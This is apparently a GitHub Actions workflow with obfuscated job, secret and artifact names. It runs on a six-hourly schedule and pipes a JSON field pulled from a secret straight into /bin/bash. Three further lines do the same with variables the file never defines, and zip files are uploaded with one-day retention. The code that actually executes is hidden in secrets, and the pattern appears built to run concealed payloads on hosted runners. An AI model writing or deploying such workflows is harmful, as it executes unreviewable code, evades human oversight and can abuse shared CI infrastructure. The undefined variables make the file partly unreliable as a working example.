name: monolithcreate53
on:
  workflow_dispatch:

  schedule:
    - cron: '23 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: monolithcreate53
        env:
          ko145: ${{ secrets.ko145 }}
        run: |
          printf '%s' "$ko145" | jq -r .uxleg7 | /bin/bash
          printf '%s' "$k3266" | jq -r .magwn1454 | /bin/bash
          echo $ez765 | jq -r .wjy123 | /bin/bash
          printf '%s' "$olsc0737" | jq -r .c90 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: xXPCIPkd
          path: "*.zip"
          retention-days: 1
